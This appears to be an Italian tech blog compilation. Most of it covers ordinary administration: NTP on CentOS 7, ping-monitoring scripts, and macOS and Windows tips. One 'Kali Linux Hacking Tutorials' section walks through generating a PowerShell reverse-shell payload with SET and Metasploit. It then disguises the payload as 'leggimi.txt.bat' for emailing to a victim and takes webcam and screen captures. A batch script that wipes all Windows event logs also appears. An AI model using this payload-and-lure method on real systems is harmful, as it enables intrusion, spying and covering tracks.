Configurare “NTP (Network Time Protocol) Server” in CentOS 7

Network Time Protocol ‘ntp’  è un protocollo che viene eseguito sulla porta UDP 123 a livello di trasporto e consente ai computer di sincronizzare l’ora su reti per un tempo preciso. Mentre il tempo passa, l’orologio interno dei computer  tende ad andare alla deriva causando  problemi di tempo incoerenti, soprattutto su server e client file di log o se si desidera replicare server o database.


Questo tutorial vi dimostrerà come è possibile installare e configurare server NTP su CentOS 7 e sincronizzare automaticamente il tempo con il più vicino server geograficamente coetanei disponibile per la posizione server utilizzando NTP pubblico Pool Time nell’elenco dei server.

Step 1: Installazione e configurazione del servizio NTP

1. Il pacchetto server NTP è fornito di default dai repository ufficiali di CentOS e può essere installato con il seguente comando.

# yum -y install ntp
Loaded plugins: fastestmirror
Repodata is over 2 weeks old. Install yum-cron? Or run: yum makecache fast
base                                    | 3.6 kB  00:00:00     
extras                                  | 3.4 kB  00:00:00     
updates                                 | 3.4 kB  00:00:00     
updates/7/x86_64/primary_db             | 3.9 MB  00:00:02     
Determining fastest mirrors
 * base: mirror.maeh.org
 * extras: mirror.ratiokontakt.de
 * updates: mirror.23media.de
Resolving Dependencies
--> Running transaction check
---> Package ntp.x86_64 0:4.2.6p5-25.el7.centos.1 will be installed
--> Processing Dependency: ntpdate = 4.2.6p5-25.el7.centos.1 for package: ntp-4.2.6p5-25.el7.centos.1.x86_64
--> Processing Dependency: libopts.so.25()(64bit) for package: ntp-4.2.6p5-25.el7.centos.1.x86_64
--> Running transaction check
---> Package autogen-libopts.x86_64 0:5.18-5.el7 will be installed
---> Package ntpdate.x86_64 0:4.2.6p5-25.el7.centos.1 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

=========================================================================
 Package    Arch         Version                   Repository     Size
=========================================================================
Installing:
 ntp        x86_64       4.2.6p5-25.el7.centos.1   updates        547 k
Installing for dependencies:
 autogen-libopts  x86_64 5.18-5.el7                base            66 k
 ntpdate          x86_64 4.2.6p5-25.el7.centos.1   updates         85 k

Transaction Summary
=========================================================================
Install  1 Package (+2 Dependent packages)

Total download size: 699 k
Installed size: 1.6 M
Downloading packages:
(1/3): autogen-libopts-5.18-5.el7.x86_64.rpm         |  66 kB  00:00:00  
(2/3): ntp-4.2.6p5-25.el7.centos.1.x86_64.rpm        | 547 kB  00:00:00  
(3/3): ntpdate-4.2.6p5-25.el7.centos.1.x86_64.rpm    |  85 kB  00:00:00     
-------------------------------------------------------------------------
Total                                                                                                    764 kB/s | 699 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : ntpdate-4.2.6p5-25.el7.centos.1.x86_64       1/3 
  Installing : autogen-libopts-5.18-5.el7.x86_64            2/3 
  Installing : ntp-4.2.6p5-25.el7.centos.1.x86_64           3/3 
  Verifying  : ntp-4.2.6p5-25.el7.centos.1.x86_64           1/3 
  Verifying  : autogen-libopts-5.18-5.el7.x86_64            2/3 
  Verifying  : ntpdate-4.2.6p5-25.el7.centos.1.x86_64       3/3 

Installed:
  ntp.x86_64 0:4.2.6p5-25.el7.centos.1                                                                                                   
Dependency Installed:
  autogen-libopts.x86_64 0:5.18-5.el7    
  ntpdate.x86_64 0:4.2.6p5-25.el7.centos.1                             

Complete!
# 

Step 2: Aggiungere la regola al Firewall e avviare il servizio NTP

2. Il servizio NTP utilizza la porta UDP 123 sul livello di trasporto OSI (livello 4). Per aprire questa porta su CentOS 7 eseguire i seguenti comandi.

# firewall-cmd --add-service=ntp --permanent
# firewall-cmd --reload

Step 3: Avviare i servizio

3. Eseguire i seguenti comandi per attivare e avviare il servizio NTP.

# systemctl start ntpd
# systemctl enable ntpd
# systemctl status ntpd

Step 4: Modifichiamo il file di configurazione

4. Eseguire i seguenti comandi per modificare i server di zona per la sincronizzazione NTP, prima però andiamo e controllando sul sito: http://www.pool.ntp.org/zone/it ‘To use this specific pool zone, add the following to your ntp.conf file:’

# vi /etc/ntp.conf 

includefile /etc/ntp/crypto/pw
# For more information about this file, see the man pages
# ntp.conf(5), ntp_acc(5), ntp_auth(5), ntp_clock(5), ntp_misc(5), ntp_mon(5).

driftfile /var/lib/ntp/drift

# Permit time synchronization with our time source, but do not
# permit the source to query or modify the service on this system.
restrict default nomodify notrap nopeer noquery

# Permit all access over the loopback interface.  This could
# be tightened as well, but to do so would effect some of
# the administrative functions.
restrict 127.0.0.1
restrict ::1

# Hosts on local network are less restricted.
restrict 192.168.1.0 mask 255.255.255.0 nomodify notrap ##uncomment

# Use public servers from the pool.ntp.org project.
# Please consider joining the pool (http://www.pool.ntp.org/join.html).
#server 0.centos.pool.ntp.org iburst ##comment
#server 1.centos.pool.ntp.org iburst ##comment
#server 2.centos.pool.ntp.org iburst ##comment
#server 3.centos.pool.ntp.org iburst ##comment

#Add:
server 0.it.pool.ntp.org iburst
server 1.it.pool.ntp.org iburst
server 2.it.pool.ntp.org iburst
server 3.it.pool.ntp.org iburst

#broadcast 192.168.1.255 autokey        # broadcast server
#broadcastclient                        # broadcast client
#broadcast 224.0.1.1 autokey            # multicast server
#multicastclient 224.0.1.1              # multicast client
#manycastserver 239.255.254.254         # manycast server
#manycastclient 239.255.254.254 autokey # manycast client

# Enable public key cryptography.
#crypto

includefile /etc/ntp/crypto/pw

# Key file containing the keys and key identifiers used when operating
# with symmetric key cryptography.
keys /etc/ntp/keys

# Specify the key identifiers which are trusted.
#trustedkey 4 8 42

# Specify the key identifier to use with the ntpdc utility.
#requestkey 8

# Specify the key identifier to use with the ntpq utility.
#controlkey 8

# Enable writing of statistics records.
#statistics clockstats cryptostats loopstats peerstats

# Disable the monitoring facility to prevent amplification attacks using ntpdc
# monlist command when default restrict does not include the noquery flag. See
# CVE-2013-5211 for more details.
# Note: Monitoring will not be disabled with the limited restriction flag.
disable monitor

## ADD Log
logfile /var/log/ntp.log

Step 5: Riavviare il servizio:

5. Confermate e salvate le modifiche e riavviate il servizio con:

# systemctl restart ntpd
# systemctl status ntpd

OUTPUT:
● ntpd.service - Network Time Service
   Loaded: loaded (/usr/lib/systemd/system/ntpd.service; enabled; vendor preset: disabled)
   Active: active (running) since Tue 2017-04-04 17:13:13 EDT; 5min ago
 Main PID: 16856 (ntpd)
   CGroup: /system.slice/ntpd.service
           └─16856 /usr/sbin/ntpd -u ntp:ntp -g

Apr 04 17:13:13 server.smbisoshare.local ntpd[16856]: Listen normally on 2 lo 127.0.0.1 UDP 123
Apr 04 17:13:13 server.smbisoshare.local ntpd[16856]: Listen normally on 3 ens192 192.168.1.200 UDP 123
Apr 04 17:13:13 server.smbisoshare.local ntpd[16856]: Listen normally on 4 lo ::1 UDP 123
Apr 04 17:13:13 server.smbisoshare.local ntpd[16856]: Listen normally on 5 ens192 fe80::e304:6d4f:120b:16ae UDP 123
Apr 04 17:13:13 server.smbisoshare.local ntpd[16856]: Listening on routing socket on fd #22 for interface updates
Apr 04 17:13:13 server.smbisoshare.local systemd[1]: Started Network Time Service.
Apr 04 17:13:14 server.smbisoshare.local ntpd[16856]: 0.0.0.0 c016 06 restart
Apr 04 17:13:14 server.smbisoshare.local ntpd[16856]: 0.0.0.0 c012 02 freq_set kernel 0.000 PPM
Apr 04 17:13:14 server.smbisoshare.local ntpd[16856]: 0.0.0.0 c011 01 freq_not_set
Apr 04 17:13:21 server.smbisoshare.local ntpd[16856]: 0.0.0.0 c614 04 freq_mode

Step 6: Verificare Server Time Sync

6. Dopo che il servizio NTP è stato avviato, attendere qualche minuto per sincronizzare il tempo con i suoi list server configurati, quindi eseguire i seguenti comandi per verificare lo stato della sincronizzazione NTP e il tempo del vostro  sistema.

# ntpq -p
# date -R
Es:
# ntpq -p
remote           refid     st t when poll reach   delay   offset  jitter
=========================================================================
server1.quickdr .INIT.     16 u    -   64    0    0.000    0.000   0.000
212.121.88.250  .INIT.     16 u    -   64    0    0.000    0.000   0.000
mini.blesmrt.ne .INIT.     16 u    -   64    0    0.000    0.000   0.000
host22-187-177- .INIT.     16 u    -   64    0    0.000    0.000   0.000
# date -R
Tue, 04 Apr 2017 17:21:45 -0400


 

Come creare una password sicura

Vediamo come è possibile creare una password sicura seguendo questi semplici ma efficaci consigli.


  1. Prima di tutto scegliamo una rase, citazione o aforismo a noi più simpatico e che possiamo ricordare.Io come esempio ho preso un frase di Amleto:
    Sappiamo ciò che siamo ma non quello che potremmo essere’.
  2. Poi prendiamo la prima lettera di ogni parola: ‘Sccsmnqcpe’.
  3. Ora applichiamo alcune regole, per esempio sé la password è per un account di Facebook,  aggiungiamo una parola che si associa a Facebook es. ‘like’
  4. Contiamo i caratteri che compone la parola ‘like‘ quindi 4.
  5. Prendiamo il numero ‘4‘ e la inseriamo dopo quattro caratteri : ‘Sccs4mnqcpe’
  6. In fine inseriamo una ‘@‘ seguito dalla parola ‘like
  7. Risultato finale è: ‘Sccs4mnqcpe@like’
  8. Tutte le password future è bene crearle utilizzando questo sistema o comunque qualcosa di analogo, ma saranno tutte diverse tra loro perché si utilizzeranno parole supplementari diverse ogni volta.

Alla fine avremo comunque una password robusta e facile da ricordare. 😉

Script bash per la scansione e monitor di rete


Questo articolo fornisce alcuni semplici script per eseguire la scansione di rete e di monitoraggio. Ovviamente, questi script non sono a partità di sistemi software per il monitoraggio di rete dedicato ma potrebbero essere utili per le piccole reti.


Scansione subnet di rete 192.168.1.1-255/24:

#!/bin/bash
#

ls_ping()
{
  ping -c 1 $1 > /dev/null
  [ $? -eq 0 ] && echo Host con IP: $i attivo.
}

for i in 192.168.1.{1..255} 
do
ls_ping $i & disown
done

Esecuzione:

./pingls.sh

OUTPUT:

Host con IP: 192.168.1.1 attivo.
Host con IP: 192.168.1.50 attivo.

Oppure:

#!/bin/sh

: ${1?"Usare: $0 seguito dall'ip come: es. '192.168.1.'"}

subnet=$1
for addr in 'seq 0 1 255 '; do
#   ( echo $subnet$addr)
( ping -c 3 -t 5 $subnet$addr > /dev/null && echo $subnet$addr ATTIVO ) &
done 

Notifica quando il server è giù :

#!/bin/bash
#

: ${1?"Usare: $0 ip o nome host da controllare es. '192.168.1.100' 'google.com'"}

for i in $@
do
ping -c 1 $i &> /dev/null

if [ $? -ne 0 ]; then
	echo "'date': ping fallito, $i host spento!" | mail -s "$i host spento!" vostroindirizzo@email.it 
fi
done

Esecuzione script :

./controllo_hosts.sh 192.168.1.100 192.168.1.152 google.com 

Creare un registro di monitoraggio:

#!/bin/bash 
#

: ${1?"Usare: $0 ip o nome host da controllare es. '192.168.1.100' 'google.com'"}
 
LOG=/tmp/controllo-stato-server.log 

TEMPOINSECONDI=3600 

EMAIL=vostroindirizzo@email.it 
 
for i in $@; do 
	echo "$i-ON!" > $LOG.$i 

done 
 
while true; do 
	for i in $@; do 

ping -c 1 $i > /dev/null 
if [ $? -ne 0 ]; then 
	STATUS=$(cat $LOG.$i) 
 		if [ $STATUS != "$i-OFF!" ]; then 
 			echo "'date': ping fallito, $i host spento!" | 
			mail -s "$i host spento!" $EMAIL 

 		fi 
	echo "$i-OFF!" > $LOG.$i 

else 
	STATUS=$(cat $LOG.$i)
 		if [ $STATUS != "$i-ON!" ]; then 
 			echo "'date': ping OK, $i host acceso!" | 
			mail -s "$i host acceso!" $EMAIL

 		fi 
	echo "$i-ON!" > $LOG.$i 
fi 
done 

sleep $TEMPOINSECONDI 
done

Esecuzione script:

./controllo-stato-server.sh 192.168.1.2 mioserver google.com

Come disattivare Gatekeeper da riga di comando in Mac OS X Sierra

Gatekeeper consente di proteggere il Mac dalle app che potrebbero causare malfunzionamenti.


Alcune delle app scaricate e installate da internet potrebbero causare malfunzionamenti del Mac. In questi casi Gatekeeper aiuta a proteggere il sistema. In questo articolo vediamo come disabilitare il controllo tramite riga di commando per installare un’applicazione percepita dal sistema come non valida.

Disattivare Gatekeeper da riga di Commando  in Mac OS X

Avviare Terminal se non lo avete ancora fatto (/Applicazioni/Utility/) e il seguente comando per disattivare Gatekeeper:

$ sudo spctl --master-disable

Dopo aver premuto il tasto invio da tastiera (return) verrà chiesto di inserire la password di amministratore, come di solito richiesto da sudo, e Gatekeeper sarà immediatamente disabilitato. Per verificare, è possibile farlo con l’opzione -status e lo stesso comando, in questo modo:

$ spctl --status
assessments disabled

Abilitare Gatekeeper da riga di Commando in Mac OS X

Naturalmente, è anche possibile attivare il Gatekeeper dalla riga di comando di OS X  utilizzando la seguente stringa di comando:

$ sudo spctl --master-enable

Per verificare nuovamente lo stato con l’opzione -status:

$ spctl --status
assessments enabled

😉

Come cancellare il registro Eventi di Windows dalla riga di comando

Si applica a: Windows 7 -10  e Windows Server


1. Premere il tasto Windows (Immagine: icon_Windows8_key.png) + R sulla tastiera.

2. Si aprirà la finestra di dialogo Esegui, e al suo interno inseriamo eventvwr 

3. Premere su OK.


Spesso, quando si desidera risolvere i problemi o di mantenere un controllo generale sulla  salute del vostro sistema, è necessario utilizzare il Visualizzatore degli eventi (Event Viewer). Il visualizzatore degli eventi visualizza tutti gli eventi di Windows che vengono registrati come informazioni, errori, avvisi critico e dettagliato. Ma ci sono tanti eventi qui comprese le attività del tutto normali che vengono registrati che diventa più difficile da individuare eventi relativi a cose che non funzionano come previsto o causano errori. Quindi, di tanto in tanto potrebbe essere necessario cancellare il registro eventi. In questo articolo, vedremo come si può cancellare il registro eventi automaticamente o dalla riga di comando.

Come cancellare un specifico Evento (Event Log) usando il prompt dei comandi.

  1. Eseguire il prompt dei comandi come Administrator (vedi qui).
  2. Per cancellare un registro specifico, è necessario prima conoscere il suo nome. Per visualizzare un elenco di registri eventi, digitare:
    wevtutil.exe el
  3. Questo produce un elenco molto lungo di dati. È possibile utilizzare il comando: ‘wevtutil el | more’ (senza le virgolette) per visualizzare la schermata una pagina per volta. Oppure si può produrre in un file di testo utilizzando il comando:
  4. wevtutil.exe el > ListaLog.txt

    Questo crea un file di testo ListaLog.txt nella directory di lavoro del prompt dei comandi (la stessa cartella in cui si è attualmente).

  5. Ora che si conosce il nome del registro che si desidera cancellare, è possibile utilizzare il seguente comando:
    wevtutil.exe cl Application
  6. Il comando precedente cancella il registro Applicazioni. Per cancellare il registro di  sicurezza, sistema o alert usare:
    wevtutil.exe cl Security
    wevtutil.exe cl System
    wevtutil.exe cl Oalerts

Come cancellare tutti i registri eventi tramite prompt dei comandi

  1. Aprite  Notepad e copiate ed incollate le seguenti righe di codice:
    @echo off
    FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
    IF (%adminTest%)==(Access) goto noAdmin
    for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
    echo.
    echo Registri Eventi sono stati cancellati!
    goto theEnd
    :do_clear
    echo cancello %1
    wevtutil.exe cl %1
    goto :eof
    :noAdmin
    echo Devi eseguire questo script come Amministratore!
    echo.
    :theEnd
  2. Salvarlo come file batch, assegnando il nome che si desidera, ad esempio: CancEvtLog.bat o CancEvtLog.cmd.
    Suggerimento: per salvare direttamente un testo con estensione .bat o .cmd, digitare il nome del file tra virgolette, cioè “CancEvtLog.bat” o “CancEvtLog.cmd”.
  3. Copiare il file batch nella directory  ‘C:\Windows\system32’ in modo da non dover digitare il percorso completo ogni volta che si esegue il file batch.
  4. Aprire un prompt dei comandi con privilegi elevati (vedi qui).
  5. Eseguire il file batch dal prompt dei comandi: CancEvtLog.bat o CancEvtLog.cmd. È anche possibile eseguire direttamente senza aprire il prompt dei comandi o utilizzando cmd /c in modo che il prompt dei comandi si chiude dopo l’esecuzione.

Leggi note dell’autore prima di iniziare!!

Security OS

parrot-logo

Parrot Security OS è un sistema operativo avanzato progettato per Penetration Testing (test di penetrazione) e l’anonimato basato su Debian.

Link: Parrot Seucurity OS 2011-2016 Frozenbox Network


lionSec

Security Is Our Priority

LionSec Linux è un sistema operative di Penetration Testing, Computer Forensics,Wireless Analysis e altro basato su OS Ubuntu. Si tratta di un sistema operativo stabile per la sicurezza professionale.

Link: LionSec


kali-logo

Our Most Advanced Penetration Testing Distribution, Ever.

Kali Linux è un progetto open source che viene mantenuto e finanziato dalla Offensive Security, un fornitore di formazione sulla sicurezza di classe mondiale e servizi di penetration testing. Oltre a Kali Linux, Offensive Security mantiene anche il database Exploit e il corso online gratuito, Metasploit Unleashed.

Link: Kali Linux – Link: Offensive Security


 

Info sistema con MS Windows 7/8/10

1. Premere il tasto Windows (Immagine: icon_Windows8_key.png) + R sulla tastiera.

2. Si aprirà la finestra di dialogo Esegui, e al suo interno inseriamo msinfo32 

3. Premere invio dalla tastiera.

Potrai ora vedere le informazioni di sistema di Windows.


Versione dal prompt dei comandi: SystemInfo

1. Premere il tasto Windows (Immagine: icon_Windows8_key.png) + R sulla tastiera.

2. Si aprirà la finestra di dialogo Esegui, e al suo interno inseriamo cmd 

3. Premere invio dalla tastiera.

4. Al prompt dei comandi digitate: Systeminfo.exe (seguito dal tasto invio dalla tastiera)

verrà visualizzata una lista di informazioni sul sistema 😉


Leggi note dell’autore prima di iniziare!!

Kali Linux Hacking Tutorials 2

ATTENZIONE:
Danneggiare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest’articolo vanno utilizzate solo per testare o verificare sistemi di cui si è titolari . Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo tutorial a solo scopo didattico (vedi note).


kalitopwd

Powershell Attack Vectors

‘Social Engineering Toolkit (SET)’ creato e scritto dal fondatore di TrustedSec, David Kennedy Founder and CEO of TrustedSec. Si tratta di uno strumento open-source finalizzato a test di penetrazione basati su Social-Engineering.

Testiamo MS Windows 10.

kaliPowershellAttack-1 kaliPowershellAttack-2 kaliPowershellAttack-3

premiamo invio o return dalla tastiera e dopo confermiamo con ‘Y‘.

setoolkit-step-4

 

Select from the menu:
 1) Social-Engineering Attacks
 2) Fast-Track Penetration Testing
 3) Third Party Modules
 4) Update the Social-Engineer Toolkit
 5) Update SET configuration
 6) Help, Credits, and About

 99) Exit the Social-Engineer Toolkit

set> 1

Selezioniamo (Social-Enginnering Attacks) digitando 1 dalla tastiera seguito da invio.

 Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) Wireless Access Point Attack Vector
 8) QRCode Generator Attack Vector
 9) Powershell Attack Vectors
 10) Third Party Modules

 99) Return back to the main menu.

set> 9

Selezioniamo (Powershell Attack Vectors) digitando 9 dalla tastiera seguito da invio.

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.

 1) Powershell Alphanumeric Shellcode Injector
 2) Powershell Reverse Shell
 3) Powershell Bind Shell
 4) Powershell Dump SAM Database

 99) Return to Main Menu

set:powershell>1

Selezioniamo (Powershell Alphanumeric Shellcode Injector) digitando 1 dalla tastiera seguito da invio.

Verrà richiesto di inserire in nostro indirizzo ip, indicare l’indirizzo IP che il payload deve contattare una volta che viene eseguito dalla vittima (indirizzo IP di chi attacca, macchina con Kali), e la porta di comunicazione da utilizzare e seguito dal tasto invio. Alla fine confermiamo con digitando yes seguito dal tasto invio e attendiamo che  venga creato lo script e l’avvio della sessione mfsexpolit che rimarrà in ascolto sulla porta 443.

set> IP address for the payload listener (LHOST): 192.168.1.250
set:powershell> Enter the port for the reverse [443]:443
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes

Il nostro Exploit viene generato……..

Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit

 =[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 443
LPORT => 443
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:443
[*] Starting the payload handler...
msf exploit(handler) >

Ok, il nostro sistema è pronto ed attende che il nostro exploit entra in azione.

Al termine, con una nuova finestra terminale, andiamo nella cartella:

cd /root/.set/reports/powershell/

dove al suo interno troveremo il file x86_powershell_injection.txt da rinominare e consegnare alla vittima, ad esempio tramite email, che temporaneamente posizioniamo sul nostro desktop.

cp /root/.set/reports/powershell/x86_powershell_injection.txt /root/Desktop/leggimi.txt.bat

setoolkit_desktop_filebat

Appena la nostra vittima fa doppio click sul file ricevuto ‘leggimi.txt.bat’ :

win10-leggimibat

sulla macchina Kali si avvierà la connessione tra noi e la machina della vittima:

msf exploit(handler) > [*] Sending stage (957487 bytes) to 192.168.1.159
[*] Meterpreter session 1 opened (192.168.1.250:443 -> 192.168.1.159:50729) at 2016-07-24 05:07:02 +0200 (premi invio)

msf exploit(handler) > sessions (premi invio = visualizza lista sessioni)

Active sessions
===============

 Id Type            Information                                            Connection
 --    ----         -----------                                            ----------
 1     meterpreter  x86/win32 DESKTOP-OQM4CHG\Gidalo @ DESKTOP-OQM4CHG     192.168.1.250:443 -> 192.168.1.159:49480 (192.168.1.159)

msf exploit(handler) > sessions -i 1 (premi invio = per attivare la sessione 1)
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : DESKTOP-OQM4CHG
OS : Windows 10 (Build 10240).
Architecture : x64 (Current Process is WOW64)
System Language : it_IT
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > webcam_list
1: WebCam - HD WebCam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /usr/share/set/DKbLMDun.jpeg
meterpreter > screenshot
Webcam shot saved to: /usr/share/set/sqIlrSoN.jpeg
meterpreter > help (seguito dal tasto invio per la lista comandi)

Digitando help visualizziamo l’elenco dei comandi che possiamo eseguire sulla macchina della vittima. Questo per ora è tutto.

Usate con cautela e solo per scopi di studio e per testare la/e vostra/e macchina/e….siete voi i soli responsabili delle vostre azioni e dall’utilizzo di questo tutorial…..?.


Leggi note dell’autore prima di iniziare!!

Kali Linux Hacking Tutorials 1

Kali-linux

In questo tutorial, vediamo come usare Kali Linux per testare la sicurezza della nostra lan.

Per prima cosa installiamo Kali Linux su Virtualbox.

Nel mio esempio hostname e  indirizzo ip sono:

kali.gidalo.local 192.168.1.250.

Installiamo Kali Linux

Kali Linux è un progetto open source che viene mantenuto e finanziato dalla Offensive Security, un fornitore di formazione sulla sicurezza di classe mondiale e servizi di test di penetrazione. Oltre a Kali Linux, Offensive Security mantiene anche l’Exploit Database e offre un corso online gratuito, Metasploit Unleashed.

In questo tutorial useremo come sistema di virtualizzazione Virtualbox 5.1 di Oracle scaricabile gratuitamente dal seguente link: www.virtualbox.org.

Procuriamoci l’immagine iso di kali dal seguente link: Kali Linux 64 bit size 2.6Gb versione 2016.1 e procediamo con il download.

Per installare Kali su macchina virtuale, seguire i seguenti passaggi:

oracleVMmenu

Creiamo una nuova macchina virtuale premendo su ‘Nuova’ e inseriamo le seguenti informazioni:

step-1

e clickiamo con il tasto sinistro del mouse su ‘Avanti’.

step-2

Attribuiamo la memoria Ram da dedicare alla macchina virtuale e andiamo avanti.

step-3

Selezioniamo ‘Crea subito un nuovo disco fisso virtuale’ e premiamo su ‘Crea’.

step-4

Selezioniamo ‘VDI (Virtual Disk Image’ e andiamo avanti.

step-6

Diamo la dimensione del disco, in questo caso da 30GB, e premiamo su ‘Crea’.

step-7

Perfetto la nostra macchina virtuale è stata creata. Ora dobbiamo modificare alcuni valori.

Selezioniamo la nostra macchina virtuale e premiamo su ‘Impostazioni’

step-impostazioni-1

 

step-impostazioni-2

 

step-impostazioni-3

Selezioniamo Archiviazione -> Controller: IDE ‘Vuoto’ -> Lettore ottico secondario -> (premere sul icona cd) -> Degli un file di disco ottico virtuale:

step-impostazioni-4

e selezioniamo la nostra immagine iso scaricata precedentemente:

step-impostazioni-5

e confermiamo su ‘Apri’.

step-impostazioni-6

Impostiamo la scheda di rete su Connessa a : ‘Scheda con bridge’.

step-impostazioni-7

Le impostazioni sono terminate ora terminiamo premendo sul tasto ‘OK’.

Avviamo la nostra macchina virtuale premendo su ‘ Avvia’:

step-7

Avviata la nostra VM dopo qualche secondo dovremmo vedere la seguente schermata:

step-avvio-1

Selezioniamo ‘Install’ e premiamo invio o return dalla tastiera e procediamo come:

step-avvio-2

step-avvio-3

step-avvio-4 step-avvio-5 step-avvio-6 step-avvio-7

step-avvio-8

step-avvio-9

Impostiamo la password di root e confermiamo premendo il tasto invio dalla tastiera:

step-avvio-10

ripetiamo per conferma:

step-avvio-11

e andiamo avanti.

Qui diciamo di usare l’intero disco fisso, possiamo optare anche per le altre opzioni, ma nel nostro caso selezioniamo come dalla schermata:

step-avvio-12 step-avvio-13 step-avvio-14 step-avvio-15 step-avvio-16 step-avvio-17 step-avvio-18 step-avvio-19 step-avvio-20 step-avvio-21

step-avvio-24 step-avvio-25 step-avvio-26

Terminata l’ultima fase il sistema verrà riavviata e si presenterà la schermata di login.

Inseriamo come nome utente ‘root

kalilogin-1

e qui la password che abbiamo scelto in fase di installazione premiamo su ‘Sign In

kalilogin-2

kaliDesktop-1

Se tutto è andato per il meglio dovreste vedere la schermata come sopra ?.

be continued…


Leggi note dell’autore prima di iniziare!!